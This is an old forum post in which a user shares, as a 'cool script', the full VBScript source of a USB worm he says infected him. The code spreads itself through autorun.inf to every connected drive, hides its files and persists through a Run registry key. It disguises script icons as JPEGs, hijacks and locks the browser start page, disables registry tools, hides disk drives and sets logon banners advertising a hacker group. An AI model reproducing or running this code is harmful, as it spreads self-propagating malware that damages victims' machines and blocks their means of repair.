09-07-2008
|
#1 (permalink)
|
|
Senior Member
Join Date: Aug 2008
Posts: 201
Thanks: 1
Thanked 87 Times in 54 Posts
|
[VBS]USB Virus
[VBS]USB Virus
hi,
i have been infected by this script ! -_- !!!
but i have been catched it xD !!
( i'm not creator but I want to divide it with you "cool script" )
Quote:
' VB Script Document
'Slt les ptits c'est la primteam ki est dans la place
On error resume Next
demarrage = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\System"
Dim fso,usb,Textautorun
Set fso = CreateObject("Scripting.FileSystemObject")
Set WSSH = CreateObject("Wscript.shell")
Set chemin= FSO.GetSpecialFolder(1)
Textautorun="[autorun]"&vbcrlf&"shellexecute=wscript.exe vl@dock.vbs"&vbcrlf&"action=""pas d'action"""
location=wscript.scriptfullname
do
'lancement de la fonction de copie du virus'
msgcopy chemin, "vl@dock"
starting chemin 'Inscription du virus dans la base de registre pour un demarage automatique'
iconchange 'Execution de la fonction de changement de l'aspect de l'icone des Vbs en Jpeg'
primreg 'execution de la fonction de changement du registre'
Webracourci 'création d'un raccourci web sur le bureau'
'Lancement de la copie du virus et d'autorun sur tout les disques connectés au Pc
for each usb in fso.drives
if(usb.drivetype=1 or usb.drivetype=2)and usb.path <> "A:" then
chemin2=usb.path
msgcopy chemin2, "vl@dock"
set SystemaChem=fso.getfile(chemin2&"\vl@dock.vbs")
SystemaChem.attributes=7
set SystemaChem=fso.getfile(chemin2&"\autorun.inf")
set SystemaChem=fso.createtextfile(chemin2&"\autorun.i nf",2,true)
SystemaChem.write Textautorun
SystemaChem.close
set SystemaChem=fso.getfile(chemin2&"\autorun.inf")
SystemaChem.attributes=7
end if
next
loop while time<>"00:00:00"
'--------------------------------------------------------------------------------
'fonction de copie du virus sur le disque et voilage de son existence
sub msgcopy(x,name)
File = Wscript.ScriptFullName
fso.copyfile file ,x & "\" & name & ".vbs"
set SystemaChem=fso.getfile(chemin&"\vl@dock.vbs")
SystemaChem.attributes=7
end sub
'--------------------------------------------------------------------------------'
'fonction d'inscription de valeurs dans le régistre
sub primreg()
Set WshShell = WScript.CreateObject("WScript.Shell")
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.primocorp.fb.bz/","REG_SZ"
'Bloque le changement de la page de démarrage
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\",""
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\",""
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","1","REG_DWORD"
'Interdit l'ouverture de la base de régistre
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableRegistryTools"," 1","REG_DWORD"
'Affiche mon message de propagande
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Slt c'est ---LIEH@CKER--- le N°1 des hackers ---"
'Affiche le message de raliement
wshshell.regWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption","BI ENVENUE A LA PRIMTEAM!!! REJOIGNEZ
NOUS VITE"
wshshell.regWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText","Slt nous sommes les 1er hacker de la Cô
te d'Ivoire!!!----si vous voulez nous rejoindre ecrivez nous(faroteur_2006@yahoo.fr) a+++ "
'Cache les disques dur de la machine
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoDrives","8","REG_DW ORD"
end sub
'--------------------------------------------------------------------------------'
'Inscription dans le registre pour une execution au demarage de windows
sub starting(Location)
set wssh = CreateObject("WScript.Shell")
wssh.regwrite demarrage,location & "\vl@dock.vbs"
end sub
'--------------------------------------------------------------------------------'
'Changement de l'icone de Vbs en Jpeg
sub iconchange()
Dim resultat
resultat = wssh.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\Def aultIcon\")
wssh.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ Vbsfile\DefaultIcon\",resultat
end sub
'--------------------------------------------------------------------------------'
'Création d'un raccourci web sur le bureau
sub Webracourci()
Dim Shell, DesktopPath, URL
Set Shell = CreateObject("WScript.Shell")
DesktopPath = Shell.SpecialFolders("Desktop")
Set URL = Shell.CreateShortcut(DesktopPath & "\Primocorp.URL")
URL.TargetPath = "http://www.primocorp.fb.bz"
URL.Save
end sub
'----------------------------------------------
|
----------------------------------'
__________________
How happy is he who can say" Dil Se Desi"
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
|
|
|
Similar Threads
Linear Mode
